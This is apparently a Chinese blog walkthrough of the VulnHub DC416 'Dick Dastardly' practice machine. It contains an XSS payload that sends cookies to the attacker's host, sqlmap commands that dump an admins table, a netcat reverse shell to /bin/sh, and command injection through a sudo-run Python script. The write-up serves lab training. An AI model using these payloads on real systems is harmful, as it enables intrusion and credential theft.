DC416-dastardly

参考:https://firefart.at/post/vulnhub_dc416_dick_dastardly/
https://habr.com/ru/post/318372/
https://g0blin.co.uk/dick-dastardly-vulnhub-writeup/

信息收集

端口,系统,服务探测

在这里插入图片描述

目录扫描

网页banner信息

index.php
在这里插入图片描述
report.php
在这里插入图片描述

漏洞利用

XSS

在report.php中存在xss
kali起一个http服务

python -m http.server
Test<img src=http://192.168.189.132:8000/dick>

在这里插入图片描述

这里应该模拟存储型XSS,靶机应该有点击留言的机制,稍几分钟后
在这里插入图片描述

截取Cookie

<script>top.location="http://192.168.189.132:8000/" + document.cookie;</script>

在这里插入图片描述
接受到Http请求,并截取到Cookie
在这里插入图片描述
编辑admin.php的cookie后无反应,观察cookie发现是base64编码,解码出一下内容

rasta:1b37y0uc4n76u3557h15p455w0rd,5uck3rz

这就是admin用户

SQL注入

index.php
注入点1:时间盲注

user=rasta&pass=admin
sqlmap -u http://192.168.189.134/index.php --data "user=rasta&pass=admin" --random-agent --level=5 --risk=3 --batch

在这里插入图片描述
注入点2:时间盲注

name=asd&msg=asd
sqlmap -u http://192.168.189.134/index.php --data "name=asd&msg=asd" --random-agent --level=5 --risk=3 --batch

在这里插入图片描述
report.php
注入点:布尔注入

issue=asdf
sqlmap -u http://192.168.189.134/report.php --data "issue=asdf"--random-agent --level=5 --risk=3 --batch

在这里插入图片描述
查找密码

sqlmap -u http://192.168.189.134/report.php --data "issue=asdf" --random-agent --level=5 --risk=3 --batch -D vulnhub -T admins --dump

在这里插入图片描述
登录Web应用程序,并显示IRC服务器的管理员应用程序。
在这里插入图片描述
我们通过此页面将我们的IP添加到白名单中,然后再次进行端口扫描

nmap -T4 -A -v -p0-65535 192.168.189.134

在这里插入图片描述
发现开放的irc服务,以root用户使用weechat连接IRC服务器

weechat
/server add vulnhub 192.168.189.134
/connect vulnhub

在这里插入图片描述
所有频道的列表/list
在这里插入图片描述
我们加入vulnhub频道,看到有一个vulnhub-bot用户

/join #vulhub
/query vulnhub-bot

我们得到一个帮助菜单:help
在这里插入图片描述
让我们执行上述命令:list
在这里插入图片描述
通过详细查看所有插件,揭示了一种方法: list Unix
在这里插入图片描述
因此,让我们尝试以下命令:shell
在这里插入图片描述
whoami
在这里插入图片描述
好的,让我们尝试一下我们在管理对话框中添加的用户的凭据:user identify vulnhub 123456
这个用户在web页面添加

在这里插入图片描述
继续shell
在这里插入图片描述
让我们使用Unix shell反弹一个shell:

Unix shell netcat -e /bin/sh 192.168.189.132

在这里插入图片描述
让我们看看当前用户可以使用哪些权限:

sudo -l

显示用户 rasta 可以在 DickDastardly 上运行以下命令: (vulnhub) NOPASSWD:

/usr/bin/python /usr/local/sbin/util.py
在这里插入图片描述
所以让我们试试看:

sudo -u vulnhub /usr/bin/python /usr/local/sbin/util.py

我使用nc接受shell,运行python脚本没回显,可以使用meterpreter生成shell,用MSF接受shell,我这就不做演示了
以上python脚本运行结果如下
在这里插入图片描述
随意尝试序号,发现2是列目录
在这里插入图片描述
且可以在目录后面用|拼接命令,于是便可以查看flag3
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值